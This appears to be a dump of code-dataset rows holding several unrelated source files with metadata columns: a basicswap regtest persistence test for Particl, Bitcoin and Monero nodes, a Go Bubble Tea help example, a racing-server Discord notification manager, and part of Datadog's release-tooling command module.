export TEST_PATH=/tmp/test_persistent
mkdir -p ${TEST_PATH}/bin/{particl,monero,bitcoin}
cp ~/tmp/particl-0.21.2.3-x86_64-linux-gnu.tar.gz ${TEST_PATH}/bin/particl
cp ~/tmp/bitcoin-0.21.1-x86_64-linux-gnu.tar.gz ${TEST_PATH}/bin/bitcoin
cp ~/tmp/monero-linux-x64-v0.17.2.3.tar.bz2 ${TEST_PATH}/bin/monero/monero-0.17.2.3-x86_64-linux-gnu.tar.bz2
export PYTHONPATH=$(pwd)
python tests/basicswap/extended/test_xmr_persistent.py
"""
import os
import sys
import json
import time
import random
import shutil
import signal
import logging
import unittest
import threading
import multiprocessing
from urllib.request import urlopen
from unittest.mock import patch
from basicswap.rpc_xmr import (
callrpc_xmr_na,
)
from basicswap.rpc import (
callrpc,
)
from tests.basicswap.mnemonics import mnemonics as test_mnemonics
from tests.basicswap.common import (
waitForServer,
)
from basicswap.contrib.rpcauth import generate_salt, password_to_hmac
import basicswap.config as cfg
import bin.basicswap_prepare as prepareSystem
import bin.basicswap_run as runSystem
def make_boolean(s):
return s.lower() in ['1', 'true']
test_path = os.path.expanduser(os.getenv('TEST_PATH', '/tmp/test_persistent'))
PARTICL_PORT_BASE = int(os.getenv('PARTICL_PORT_BASE', '11938'))
BITCOIN_PORT_BASE = int(os.getenv('BITCOIN_PORT_BASE', '10938'))
RESET_TEST = make_boolean(os.getenv('RESET_TEST', 'false'))
XMR_BASE_P2P_PORT = 17792
XMR_BASE_RPC_PORT = 29798
XMR_BASE_WALLET_RPC_PORT = 29998
PORT_OFS = 1
UI_PORT = 12700 + PORT_OFS
BASE_PART_RPC_PORT = 19792
BASE_BTC_RPC_PORT = 19796
NUM_NODES = int(os.getenv('NUM_NODES', 3))
EXTRA_CONFIG_JSON = json.loads(os.getenv('EXTRA_CONFIG_JSON', '{}'))
logger = logging.getLogger()
logger.level = logging.DEBUG
if not len(logger.handlers):
logger.addHandler(logging.StreamHandler(sys.stdout))
def recursive_update_dict(base, new_vals):
for key, value in new_vals.items():
if key in base and isinstance(value, dict):
recursive_update_dict(base[key], value)
else:
base[key] = value
def callpartrpc(node_id, method, params=[], wallet=None, base_rpc_port=BASE_PART_RPC_PORT + PORT_OFS):
auth = 'test_part_{0}:test_part_pwd_{0}'.format(node_id)
return callrpc(base_rpc_port + node_id, auth, method, params, wallet)
def callbtcrpc(node_id, method, params=[], wallet=None, base_rpc_port=BASE_BTC_RPC_PORT + PORT_OFS):
auth = 'test_btc_{0}:test_btc_pwd_{0}'.format(node_id)
return callrpc(base_rpc_port + node_id, auth, method, params, wallet)
def updateThread(cls):
while not cls.delay_event.is_set():
try:
if cls.btc_addr is not None:
callbtcrpc(0, 'generatetoaddress', [1, cls.btc_addr])
except Exception as e:
print('updateThread error', str(e))
cls.delay_event.wait(random.randrange(cls.update_min, cls.update_max))
def updateThreadXmr(cls):
while not cls.delay_event.is_set():
try:
if cls.xmr_addr is not None:
callrpc_xmr_na(XMR_BASE_RPC_PORT + 1, 'generateblocks', {'wallet_address': cls.xmr_addr, 'amount_of_blocks': 1})
except Exception as e:
print('updateThreadXmr error', str(e))
cls.delay_event.wait(random.randrange(cls.xmr_update_min, cls.xmr_update_max))
class Test(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(Test, cls).setUpClass()
cls.update_min = int(os.getenv('UPDATE_THREAD_MIN_WAIT', '1'))
cls.update_max = cls.update_min * 4
cls.xmr_update_min = int(os.getenv('XMR_UPDATE_THREAD_MIN_WAIT', '1'))
cls.xmr_update_max = cls.xmr_update_min * 4
cls.delay_event = threading.Event()
cls.update_thread = None
cls.update_thread_xmr = None
cls.processes = []
cls.btc_addr = None
cls.xmr_addr = None
random.seed(time.time())
logging.info('Preparing %d nodes.', NUM_NODES)
for i in range(NUM_NODES):
logging.info('Preparing node: %d.', i)
client_path = os.path.join(test_path, 'client{}'.format(i))
config_path = os.path.join(client_path, cfg.CONFIG_FILENAME)
if RESET_TEST:
try:
logging.info('Removing dir %s', client_path)
shutil.rmtree(client_path)
except Exception as ex:
logging.warning('setUpClass %s', str(ex))
if not os.path.exists(config_path):
os.environ['PART_RPC_PORT'] = str(BASE_PART_RPC_PORT)
os.environ['BTC_RPC_PORT'] = str(BASE_BTC_RPC_PORT)
testargs = [
'basicswap-prepare',
'-datadir="{}"'.format(client_path),
'-bindir="{}"'.format(os.path.join(test_path, 'bin')),
'-portoffset={}'.format(i + PORT_OFS),
'-regtest',
'-withcoins=monero,bitcoin',
'-noextractover',
'-xmrrestoreheight=0']
if i < len(test_mnemonics):
testargs.append('-particl_mnemonic="{}"'.format(test_mnemonics[i]))
with patch.object(sys, 'argv', testargs):
prepareSystem.main()
with open(os.path.join(client_path, 'particl', 'particl.conf'), 'r') as fp:
lines = fp.readlines()
with open(os.path.join(client_path, 'particl', 'particl.conf'), 'w') as fp:
for line in lines:
if not line.startswith('staking'):
fp.write(line)
fp.write('port={}\n'.format(PARTICL_PORT_BASE + i + PORT_OFS))
fp.write('bind=127.0.0.1\n')
fp.write('dnsseed=0\n')
fp.write('discover=0\n')
fp.write('listenonion=0\n')
fp.write('upnp=0\n')
fp.write('minstakeinterval=5\n')
fp.write('smsgsregtestadjust=0\n')
salt = generate_salt(16)
fp.write('rpcauth={}:{}${}\n'.format('test_part_' + str(i), salt, password_to_hmac(salt, 'test_part_pwd_' + str(i))))
for ip in range(NUM_NODES):
if ip != i:
fp.write('connect=127.0.0.1:{}\n'.format(PARTICL_PORT_BASE + ip + PORT_OFS))
# Pruned nodes don't provide blocks
with open(os.path.join(client_path, 'bitcoin', 'bitcoin.conf'), 'r') as fp:
lines = fp.readlines()
with open(os.path.join(client_path, 'bitcoin', 'bitcoin.conf'), 'w') as fp:
for line in lines:
if not line.startswith('prune'):
fp.write(line)
fp.write('port={}\n'.format(BITCOIN_PORT_BASE + i + PORT_OFS))
fp.write('bind=127.0.0.1\n')
fp.write('dnsseed=0\n')
fp.write('discover=0\n')
fp.write('listenonion=0\n')
fp.write('upnp=0\n')
salt = generate_salt(16)
fp.write('rpcauth={}:{}${}\n'.format('test_btc_' + str(i), salt, password_to_hmac(salt, 'test_btc_pwd_' + str(i))))
for ip in range(NUM_NODES):
if ip != i:
fp.write('connect=127.0.0.1:{}\n'.format(BITCOIN_PORT_BASE + ip + PORT_OFS))
for opt in EXTRA_CONFIG_JSON.get('btc{}'.format(i), []):
fp.write(opt + '\n')
with open(os.path.join(client_path, 'monero', 'monerod.conf'), 'a') as fp:
fp.write('p2p-bind-ip=127.0.0.1\n')
fp.write('p2p-bind-port={}\n'.format(XMR_BASE_P2P_PORT + i + PORT_OFS))
for ip in range(NUM_NODES):
if ip != i:
fp.write('add-exclusive-node=127.0.0.1:{}\n'.format(XMR_BASE_P2P_PORT + ip + PORT_OFS))
with open(config_path) as fs:
settings = json.load(fs)
settings['min_delay_event'] = 1
settings['max_delay_event'] = 4
settings['min_delay_retry'] = 15
settings['max_delay_retry'] = 30
settings['min_sequence_lock_seconds'] = 60
settings['check_progress_seconds'] = 5
settings['check_watched_seconds'] = 5
settings['check_expired_seconds'] = 60
settings['check_events_seconds'] = 5
settings['check_xmr_swaps_seconds'] = 5
settings['chainclients']['particl']['rpcuser'] = 'test_part_' + str(i)
settings['chainclients']['particl']['rpcpassword'] = 'test_part_pwd_' + str(i)
settings['chainclients']['bitcoin']['rpcuser'] = 'test_btc_' + str(i)
settings['chainclients']['bitcoin']['rpcpassword'] = 'test_btc_pwd_' + str(i)
extra_config = EXTRA_CONFIG_JSON.get('sc{}'.format(i), {})
recursive_update_dict(settings, extra_config)
with open(config_path, 'w') as fp:
json.dump(settings, fp, indent=4)
signal.signal(signal.SIGINT, lambda signal, frame: cls.signal_handler(cls, signal, frame))
def signal_handler(self, sig, frame):
logging.info('signal {} detected.'.format(sig))
self.delay_event.set()
def run_thread(self, client_id):
client_path = os.path.join(test_path, 'client{}'.format(client_id))
testargs = ['basicswap-run', '-datadir=' + client_path, '-regtest']
with patch.object(sys, 'argv', testargs):
runSystem.main()
def start_processes(self):
self.delay_event.clear()
for i in range(NUM_NODES):
self.processes.append(multiprocessing.Process(target=self.run_thread, args=(i,)))
self.processes[-1].start()
for i in range(NUM_NODES):
waitForServer(self.delay_event, UI_PORT + i)
wallets = json.loads(urlopen('http://127.0.0.1:{}/json/wallets'.format(UI_PORT + 1)).read())
self.xmr_addr = wallets['6']['deposit_address']
num_blocks = 100
if callrpc_xmr_na(XMR_BASE_RPC_PORT + 1, 'get_block_count')['count'] < num_blocks:
logging.info('Mining {} Monero blocks to {}.'.format(num_blocks, self.xmr_addr))
callrpc_xmr_na(XMR_BASE_RPC_PORT + 1, 'generateblocks', {'wallet_address': self.xmr_addr, 'amount_of_blocks': num_blocks})
logging.info('XMR blocks: %d', callrpc_xmr_na(XMR_BASE_RPC_PORT + 1, 'get_block_count')['count'])
self.btc_addr = callbtcrpc(0, 'getnewaddress', ['mining_addr', 'bech32'])
num_blocks = 500 # Mine enough to activate segwit
if callbtcrpc(0, 'getblockchaininfo')['blocks'] < num_blocks:
logging.info('Mining %d Bitcoin blocks to %s', num_blocks, self.btc_addr)
callbtcrpc(0, 'generatetoaddress', [num_blocks, self.btc_addr])
logging.info('BTC blocks: %d', callbtcrpc(0, 'getblockchaininfo')['blocks'])
# Lower output split threshold for more stakeable outputs
for i in range(NUM_NODES):
callpartrpc(i, 'walletsettings', ['stakingoptions', {'stakecombinethreshold': 100, 'stakesplitthreshold': 200}])
self.update_thread = threading.Thread(target=updateThread, args=(self,))
self.update_thread.start()
self.update_thread_xmr = threading.Thread(target=updateThreadXmr, args=(self,))
self.update_thread_xmr.start()
# Wait for height, or sequencelock is thrown off by genesis blocktime
num_blocks = 3
logging.info('Waiting for Particl chain height %d', num_blocks)
for i in range(60):
if self.delay_event.is_set():
raise ValueError('Test stopped.')
particl_blocks = callpartrpc(0, 'getblockchaininfo')['blocks']
print('particl_blocks', particl_blocks)
if particl_blocks >= num_blocks:
break
self.delay_event.wait(1)
logging.info('PART blocks: %d', callpartrpc(0, 'getblockchaininfo')['blocks'])
assert(particl_blocks >= num_blocks)
@classmethod
def tearDownClass(cls):
logging.info('Stopping test')
cls.delay_event.set()
if cls.update_thread:
cls.update_thread.join()
if cls.update_thread_xmr:
cls.update_thread_xmr.join()
for p in cls.processes:
p.terminate()
for p in cls.processes:
p.join()
cls.update_thread = None
cls.update_thread_xmr = None
cls.processes = []
def test_persistent(self):
self.start_processes()
waitForServer(self.delay_event, UI_PORT + 0)
waitForServer(self.delay_event, UI_PORT + 1)
while not self.delay_event.is_set():
logging.info('Looping indefinitely, ctrl+c to exit.')
self.delay_event.wait(10)
if __name__ == '__main__':
unittest.main()
| []
| []
| [
"BITCOIN_PORT_BASE",
"PART_RPC_PORT",
"XMR_UPDATE_THREAD_MIN_WAIT",
"BTC_RPC_PORT",
"TEST_PATH",
"NUM_NODES",
"EXTRA_CONFIG_JSON",
"RESET_TEST",
"PARTICL_PORT_BASE",
"UPDATE_THREAD_MIN_WAIT"
]
| [] | ["BITCOIN_PORT_BASE", "PART_RPC_PORT", "XMR_UPDATE_THREAD_MIN_WAIT", "BTC_RPC_PORT", "TEST_PATH", "NUM_NODES", "EXTRA_CONFIG_JSON", "RESET_TEST", "PARTICL_PORT_BASE", "UPDATE_THREAD_MIN_WAIT"] | python | 10 | 0 | |
examples/help/main.go | package main
import (
"fmt"
"os"
"strings"
"github.com/charmbracelet/bubbles/help"
"github.com/charmbracelet/bubbles/key"
tea "github.com/charmbracelet/bubbletea"
"github.com/charmbracelet/lipgloss"
)
// keyMap defines a set of keybindings. To work for help it must satisfy
// key.Map. It could also very easily be a map[string]key.Binding.
type keyMap struct {
Up key.Binding
Down key.Binding
Left key.Binding
Right key.Binding
Help key.Binding
Quit key.Binding
}
// ShortHelp returns keybindings to be shown in the mini help view. It's part
// of the key.Map interface.
func (k keyMap) ShortHelp() []key.Binding {
return []key.Binding{k.Help, k.Quit}
}
// FullHelp returns keybindings for the expanded help view. It's part of the
// key.Map interface.
func (k keyMap) FullHelp() [][]key.Binding {
return [][]key.Binding{
{k.Up, k.Down, k.Left, k.Right}, // first column
{k.Help, k.Quit}, // second column
}
}
var keys = keyMap{
Up: key.NewBinding(
key.WithKeys("up", "k"),
key.WithHelp("↑/k", "move up"),
),
Down: key.NewBinding(
key.WithKeys("down", "j"),
key.WithHelp("↓/j", "move down"),
),
Left: key.NewBinding(
key.WithKeys("left", "h"),
key.WithHelp("←/h", "move left"),
),
Right: key.NewBinding(
key.WithKeys("right", "l"),
key.WithHelp("→/l", "move right"),
),
Help: key.NewBinding(
key.WithKeys("?"),
key.WithHelp("?", "toggle help"),
),
Quit: key.NewBinding(
key.WithKeys("q", "esc", "ctrl+c"),
key.WithHelp("q", "quit"),
),
}
type model struct {
keys keyMap
help help.Model
inputStyle lipgloss.Style
lastKey string
quitting bool
}
func newModel() model {
return model{
keys: keys,
help: help.NewModel(),
inputStyle: lipgloss.NewStyle().Foreground(lipgloss.Color("#FF75B7")),
}
}
func (m model) Init() tea.Cmd {
return nil
}
func (m model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
switch msg := msg.(type) {
case tea.WindowSizeMsg:
// If we set a width on the help menu it can it can gracefully truncate
// its view as needed.
m.help.Width = msg.Width
case tea.KeyMsg:
switch {
case key.Matches(msg, m.keys.Up):
m.lastKey = "↑"
case key.Matches(msg, m.keys.Down):
m.lastKey = "↓"
case key.Matches(msg, m.keys.Left):
m.lastKey = "←"
case key.Matches(msg, m.keys.Right):
m.lastKey = "→"
case key.Matches(msg, m.keys.Help):
m.help.ShowAll = !m.help.ShowAll
case key.Matches(msg, m.keys.Quit):
m.quitting = true
return m, tea.Quit
}
}
return m, nil
}
func (m model) View() string {
if m.quitting {
return "Bye!\n"
}
var status string
if m.lastKey == "" {
status = "Waiting for input..."
} else {
status = "You chose: " + m.inputStyle.Render(m.lastKey)
}
helpView := m.help.View(m.keys)
height := 8 - strings.Count(status, "\n") - strings.Count(helpView, "\n")
return "\n" + status + strings.Repeat("\n", height) + helpView
}
func main() {
if os.Getenv("HELP_DEBUG") != "" {
if f, err := tea.LogToFile("debug.log", "help"); err != nil {
fmt.Println("Couldn't open a file for logging:", err)
os.Exit(1)
} else {
defer f.Close()
}
}
if err := tea.NewProgram(newModel()).Start(); err != nil {
fmt.Printf("Could not start program :(\n%v\n", err)
os.Exit(1)
}
}
| [
"\"HELP_DEBUG\""
]
| []
| [
"HELP_DEBUG"
]
| [] | ["HELP_DEBUG"] | go | 1 | 0 | |
notification_manager.go | package servermanager
import (
"fmt"
"net/url"
"os"
"strconv"
"strings"
"time"
"github.com/hako/durafmt"
"github.com/sirupsen/logrus"
)
type NotificationDispatcher interface {
HasNotificationReminders() bool
GetNotificationReminders() []int
SendMessage(title string, msg string) error
SendMessageWithLink(title string, msg string, linkText string, link *url.URL) error
SendRaceStartMessage(config ServerConfig, event RaceEvent) error
SendRaceScheduledMessage(event *CustomRace, date time.Time) error
SendRaceCancelledMessage(event *CustomRace, date time.Time) error
SendRaceReminderMessage(event *CustomRace, timer int) error
SendChampionshipReminderMessage(championship *Championship, event *ChampionshipEvent, timer int) error
SendRaceWeekendReminderMessage(raceWeekend *RaceWeekend, session *RaceWeekendSession, timer int) error
SaveServerOptions(oldServerOpts *GlobalServerConfig, newServerOpts *GlobalServerConfig) error
}
// NotificationManager is the generic notification handler, which calls the individual notification
// managers. Initially, only a Discord manager is implemented.
type NotificationManager struct {
discordManager *DiscordManager
carManager *CarManager
store Store
testing bool
}
func NewNotificationManager(discord *DiscordManager, cars *CarManager, store Store) *NotificationManager {
return &NotificationManager{
discordManager: discord,
carManager: cars,
store: store,
testing: os.Getenv("NOTIFICATION_TEST_MODE") == "true",
}
}
// check to see if any notification handlers need to process option changes
func (nm *NotificationManager) SaveServerOptions(oldServerOpts *GlobalServerConfig, newServerOpts *GlobalServerConfig) error {
return nm.discordManager.SaveServerOptions(oldServerOpts, newServerOpts)
}
func (nm *NotificationManager) Stop() error {
return nm.discordManager.Stop()
}
// HasNotificationReminders just tells us if we need to do any reminder scheduling
func (nm *NotificationManager) HasNotificationReminders() bool {
reminders := nm.GetNotificationReminders()
return len(reminders) > 0
}
// GetNotificationReminders returns an array of int timers
// Doesn't return errors, just omits anything it doesn't like and logs errors
func (nm *NotificationManager) GetNotificationReminders() []int {
var reminders []int
serverOpts, err := nm.store.LoadServerOptions()
if err != nil {
logrus.WithError(err).Errorf("couldn't load server options")
return reminders
}
timers := strings.Split(serverOpts.NotificationReminderTimers, ",")
for _, a := range timers {
if strings.TrimSpace(a) == "" {
continue
}
i, err := strconv.Atoi(strings.TrimSpace(a))
if err != nil {
logrus.WithError(err).Errorf("couldn't convert notification time to int")
continue
}
if i == 0 {
continue
}
reminders = append(reminders, i)
}
return reminders
}
// SendMessage sends a message (surprise surprise)
func (nm *NotificationManager) SendMessage(title string, msg string) error {
var err error
// Call all message senders here ... atm just discord. The manager will know if it's enabled or not, so just call it
if !nm.testing {
err = nm.discordManager.SendMessage(title, msg)
}
return err
}
// SendMessageWithLink sends a message with an embedded CM join link
func (nm *NotificationManager) SendMessageWithLink(title string, msg string, linkText string, link *url.URL) error {
var err error
// Call all message senders here ... atm just discord. The manager will know if it's enabled or not, so just call it
if !nm.testing {
err = nm.discordManager.SendMessageWithLink(title, msg, linkText, link)
}
return err
}
// SendRaceStartMessage sends a message as a race session is started
func (nm *NotificationManager) SendRaceStartMessage(config ServerConfig, event RaceEvent) error {
serverOpts, err := nm.store.LoadServerOptions()
if err != nil {
logrus.WithError(err).Errorf("couldn't load server options, skipping notification")
return err
}
msg := ""
eventName := event.EventName()
trackInfo := trackSummary(config.CurrentRaceConfig.Track, config.CurrentRaceConfig.TrackLayout)
if eventName != "" {
msg = fmt.Sprintf("%s race at %s is starting now", eventName, trackInfo)
} else {
msg = fmt.Sprintf("Race at %s is starting now", trackInfo)
}
msg += fmt.Sprintf("\nServer: %s", serverOpts.Name)
if serverOpts.ShowPasswordInNotifications == 1 {
passwordString := "\nNo password"
if event.OverrideServerPassword() {
if event.ReplacementServerPassword() != "" {
passwordString = fmt.Sprintf("\nPassword is '%s' (no quotes)", event.ReplacementServerPassword())
}
} else if config.GlobalServerConfig.Password != "" {
passwordString = fmt.Sprintf("\nPassword is '%s' (no quotes)", config.GlobalServerConfig.Password)
}
msg += passwordString
}
title := fmt.Sprintf("Race starting at %s", trackInfo)
if config.GlobalServerConfig.ShowContentManagerJoinLink == 1 {
link, err := getContentManagerJoinLink(config)
linkText := ""
if err != nil {
logrus.WithError(err).Errorf("could not get CM join link")
return nm.SendMessage(title, msg)
} else {
linkText = "Content Manager join link"
// delay sending message by 20 seconds to give server time to register with lobby so CM link works
time.AfterFunc(time.Duration(20)*time.Second, func() {
_ = nm.SendMessageWithLink(title, msg, linkText, link)
})
return nil
}
} else {
return nm.SendMessage(title, msg)
}
}
// GetCarList takes a ; sep string of cars from a race config, returns , sep of UI names with download links added
func (nm *NotificationManager) GetCarList(cars string) string {
var aCarNames []string
for _, carName := range strings.Split(cars, ";") {
car, err := nm.carManager.LoadCar(carName, nil)
if err != nil {
logrus.WithError(err).Warnf("Could not load car details for: %s", carName)
continue
}
if car.Details.DownloadURL != "" {
aCarNames = append(aCarNames, car.Details.Name+" ([download]("+car.Details.DownloadURL+"))")
} else {
aCarNames = append(aCarNames, car.Details.Name)
}
}
return strings.Join(aCarNames, ", ")
}
// GetTrackInfo returns the track summary with any download link appended
func (nm *NotificationManager) GetTrackInfo(track string, layout string, download bool) string {
trackInfo := trackSummary(track, layout)
if download {
trackLink := trackDownloadLink(track)
if trackLink != "" {
trackInfo += " ([download](" + trackLink + "))"
}
}
return trackInfo
}
// SendRaceScheduledMessage sends a notification when a race is scheduled
func (nm *NotificationManager) SendRaceScheduledMessage(event *CustomRace, date time.Time) error {
serverOpts, err := nm.store.LoadServerOptions()
if err != nil {
logrus.WithError(err).Errorf("couldn't load server options, skipping notification")
return err
}
if serverOpts.NotifyWhenScheduled != 1 {
return nil
}
msg := "A new event has been scheduled\n"
msg += fmt.Sprintf("Server: %s\n", serverOpts.Name)
eventName := event.EventName()
if eventName != "" {
msg += fmt.Sprintf("Event name: %s\n", eventName)
}
msg += fmt.Sprintf("Date: %s\n", date.Format("Mon, 02 Jan 2006 15:04:05 MST"))
carNames := nm.GetCarList(event.RaceConfig.Cars)
trackInfo := nm.GetTrackInfo(event.RaceConfig.Track, event.RaceConfig.TrackLayout, true)
msg += fmt.Sprintf("Track: %s\n", trackInfo)
msg += fmt.Sprintf("Car(s): %s\n", carNames)
title := fmt.Sprintf("Race scheduled at %s", nm.GetTrackInfo(event.RaceConfig.Track, event.RaceConfig.TrackLayout, false))
return nm.SendMessage(title, msg)
}
// SendRaceCancelledMessage sends a notification when a race is cancelled
func (nm *NotificationManager) SendRaceCancelledMessage(event *CustomRace, date time.Time) error {
serverOpts, err := nm.store.LoadServerOptions()
if err != nil {
logrus.WithError(err).Errorf("couldn't load server options, skipping notification")
return err
}
if serverOpts.NotifyWhenScheduled != 1 {
return nil
}
dateStr := date.Format("Mon, 02 Jan 2006 15:04:05 MST")
msg := "The following scheduled race has been cancelled\n"
msg += fmt.Sprintf("Server: %s\n", serverOpts.Name)
eventName := event.EventName()
trackInfo := trackSummary(event.RaceConfig.Track, event.RaceConfig.TrackLayout)
if eventName != "" {
msg += fmt.Sprintf("Event name: %s\n", eventName)
}
msg += fmt.Sprintf("Date: %s\n", dateStr)
msg += fmt.Sprintf("Track: %s\n", trackInfo)
title := fmt.Sprintf("Race cancelled at %s", trackInfo)
return nm.SendMessage(title, msg)
}
// SendRaceReminderMessage sends a reminder a configurable number of minutes prior to a race starting
func (nm *NotificationManager) SendRaceReminderMessage(event *CustomRace, timer int) error {
msg := ""
trackInfo := nm.GetTrackInfo(event.RaceConfig.Track, event.RaceConfig.TrackLayout, true)
eventName := event.EventName()
carList := nm.GetCarList(event.RaceConfig.Cars)
reminder := durafmt.Parse(time.Duration(timer) * time.Minute).String()
if eventName != "" {
msg = fmt.Sprintf("%s race at %s starts in %s\nCars: %s", eventName, trackInfo, reminder, carList)
} else {
msg = fmt.Sprintf("Race at %s starts in %s\nCars: %s", trackInfo, reminder, carList)
}
title := fmt.Sprintf("Race reminder - %s", reminder)
return nm.SendMessage(title, msg)
}
// SendChampionshipReminderMessage sends a reminder a configurable number of minutes prior to a championship race starting
func (nm *NotificationManager) SendChampionshipReminderMessage(championship *Championship, event *ChampionshipEvent, timer int) error {
reminder := durafmt.Parse(time.Duration(timer) * time.Minute).String()
title := fmt.Sprintf("Race reminder - %s", reminder)
trackInfo := nm.GetTrackInfo(event.RaceSetup.Track, event.RaceSetup.TrackLayout, true)
msg := fmt.Sprintf("%s race at %s starts in %s", championship.Name, trackInfo, reminder)
return nm.SendMessage(title, msg)
}
// SendRaceWeekendReminderMessage sends a reminder a configurable number of minutes prior to a RaceWeekendSession starting
func (nm *NotificationManager) SendRaceWeekendReminderMessage(raceWeekend *RaceWeekend, session *RaceWeekendSession, timer int) error {
reminder := durafmt.Parse(time.Duration(timer) * time.Minute).String()
title := fmt.Sprintf("Race reminder - %s", reminder)
trackInfo := nm.GetTrackInfo(session.RaceConfig.Track, session.RaceConfig.TrackLayout, true)
msg := fmt.Sprintf("%s at %s (%s Race Weekend) starts in %s", session.Name(), raceWeekend.Name, trackInfo, reminder)
return nm.SendMessage(title, msg)
}
| [
"\"NOTIFICATION_TEST_MODE\""
]
| []
| [
"NOTIFICATION_TEST_MODE"
]
| [] | ["NOTIFICATION_TEST_MODE"] | go | 1 | 0 | |
datadog_checks_dev/datadog_checks/dev/tooling/commands/release.py | # (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import time
from collections import OrderedDict, namedtuple
from datetime import datetime
import click
from semver import parse_version_info
from six import StringIO, iteritems
from .dep import freeze as dep_freeze
from .utils import (
CONTEXT_SETTINGS, abort, echo_failure, echo_info, echo_success, echo_waiting, echo_warning
)
from ..constants import (
AGENT_REQ_FILE, AGENT_V5_ONLY, CHANGELOG_TYPE_NONE, get_root
)
from ..git import (
get_current_branch, parse_pr_numbers, get_diff, git_tag, git_commit
)
from ..github import from_contributor, get_changelog_types, get_pr, get_pr_from_hash
from ..release import (
get_agent_requirement_line, get_release_tag_string, update_agent_requirements,
update_version_module
)
from ..trello import TrelloClient
from ..utils import (
get_bump_function, get_current_agent_version, get_valid_checks,
get_version_string, format_commit_id, parse_pr_number
)
from ...structures import EnvVars
from ...subprocess import run_command
from ...utils import (
basepath, chdir, ensure_unicode, get_next, remove_path, stream_file_lines,
write_file, write_file_lines
)
ChangelogEntry = namedtuple('ChangelogEntry', 'number, title, url, author, author_url, from_contributor')
def validate_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
try:
parts = value.split('.')
if len(parts) == 2:
parts.append('0')
version_info = parse_version_info('.'.join(parts))
return '{}.{}'.format(version_info.major, version_info.minor)
except ValueError:
raise click.BadParameter('needs to be in semver format x.y[.z]')
@click.group(
context_settings=CONTEXT_SETTINGS,
short_help='Manage the release of checks'
)
def release():
pass
@release.group(
context_settings=CONTEXT_SETTINGS,
short_help='Show release information'
)
def show():
"""To avoid GitHub's public API rate limits, you need to set
`github.user`/`github.token` in your config file or use the
`DD_GITHUB_USER`/`DD_GITHUB_TOKEN` environment variables.
"""
pass
@show.command(
context_settings=CONTEXT_SETTINGS,
short_help='Show all the checks that can be released'
)
@click.option('--quiet', '-q', is_flag=True)
@click.pass_context
def ready(ctx, quiet):
"""Show all the checks that can be released."""
user_config = ctx.obj
cached_prs = {}
for target in sorted(get_valid_checks()):
# get the name of the current release tag
cur_version = get_version_string(target)
target_tag = get_release_tag_string(target, cur_version)
# get the diff from HEAD
diff_lines = get_diff(target, target_tag)
# get the number of PRs that could be potentially released
# Only show the ones that have a changelog label that isn't no-changelog
pr_numbers = parse_pr_numbers(diff_lines)
shippable_prs = 0
for pr_num in pr_numbers:
try:
if pr_num in cached_prs:
changelog_labels = cached_prs[pr_num]
if len(changelog_labels) != 1:
continue
else:
payload = get_pr(pr_num, user_config)
changelog_labels = get_changelog_types(payload)
cached_prs[pr_num] = changelog_labels
if not changelog_labels:
echo_warning(
'PR #{} has no changelog label attached, please add one! Skipping...'.format(pr_num)
)
continue
if len(changelog_labels) > 1:
echo_warning(
'Multiple changelog labels found attached to PR #{}, '
'please only use one! Skipping...'.format(pr_num)
)
continue
if changelog_labels[0] != CHANGELOG_TYPE_NONE:
shippable_prs += 1
except Exception as e:
echo_failure('Unable to fetch info for PR #{}: {}'.format(pr_num, e))
continue
if shippable_prs:
if quiet:
msg = target
else:
msg = (
'Check {} has {} out of {} merged PRs that could be released'
''.format(target, shippable_prs, len(pr_numbers))
)
echo_info(msg)
@show.command(
context_settings=CONTEXT_SETTINGS,
short_help='Show all the pending PRs for a given check'
)
@click.argument('check')
@click.option('--dry-run', '-n', is_flag=True)
@click.pass_context
def changes(ctx, check, dry_run):
"""Show all the pending PRs for a given check."""
if not dry_run and check not in get_valid_checks():
abort('Check `{}` is not an Agent-based Integration'.format(check))
# get the name of the current release tag
cur_version = get_version_string(check)
target_tag = get_release_tag_string(check, cur_version)
# get the diff from HEAD
diff_lines = get_diff(check, target_tag)
# for each PR get the title, we'll use it to populate the changelog
pr_numbers = parse_pr_numbers(diff_lines)
if not dry_run:
echo_info('Found {} PRs merged since tag: {}'.format(len(pr_numbers), target_tag))
user_config = ctx.obj
if dry_run:
changelog_types = []
for pr_num in pr_numbers:
try:
payload = get_pr(pr_num, user_config)
except Exception as e:
echo_failure('Unable to fetch info for PR #{}: {}'.format(pr_num, e))
continue
current_changelog_types = get_changelog_types(payload)
if not current_changelog_types:
abort('No valid changelog labels found attached to PR #{}, please add one!'.format(pr_num))
elif len(current_changelog_types) > 1:
abort('Multiple changelog labels found attached to PR #{}, please only use one!'.format(pr_num))
current_changelog_type = current_changelog_types[0]
if current_changelog_type != 'no-changelog':
changelog_types.append(current_changelog_type)
return cur_version, changelog_types
else:
for pr_num in pr_numbers:
try:
payload = get_pr(pr_num, user_config)
except Exception as e:
echo_failure('Unable to fetch info for PR #{}: {}'.format(pr_num, e))
continue
changelog_types = get_changelog_types(payload)
echo_success(payload.get('title'))
echo_info(' * Url: {}'.format(payload.get('html_url')))
echo_info(' * Changelog status: ', nl=False)
if not changelog_types:
echo_warning('WARNING! No changelog labels attached.\n')
elif len(changelog_types) > 1:
echo_warning('WARNING! Too many changelog labels attached: {}\n'.format(', '.join(changelog_types)))
else:
echo_success('{}\n'.format(changelog_types[0]))
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Create a Trello card for each change that needs to be tested'
)
@click.option('--start', 'start_id', help='The PR number or commit hash to start at')
@click.option('--since', 'agent_version', callback=validate_version, help='The version of the Agent to compare')
@click.option('--dry-run', '-n', is_flag=True, help='Only show the changes')
@click.pass_context
def testable(ctx, start_id, agent_version, dry_run):
"""Create a Trello card for each change that needs to be tested for
the next release. Run via `ddev -x release testable` to force the use
of the current directory.
To avoid GitHub's public API rate limits, you need to set
`github.user`/`github.token` in your config file or use the
`DD_GITHUB_USER`/`DD_GITHUB_TOKEN` environment variables.
\b
To use Trello:
1. Go to `https://trello.com/app-key` and copy your API key.
2. Run `ddev config set trello.key` and paste your API key.
3. Go to `https://trello.com/1/authorize?key=key&name=name&scope=read,write&expiration=never&response_type=token`,
where `key` is your API key and `name` is the name to give your token, e.g. ReleaseTestingYourName.
Authorize access and copy your token.
4. Run `ddev config set trello.token` and paste your token.
"""
root = get_root()
repo = basepath(root)
if repo not in ('integrations-core', 'datadog-agent'):
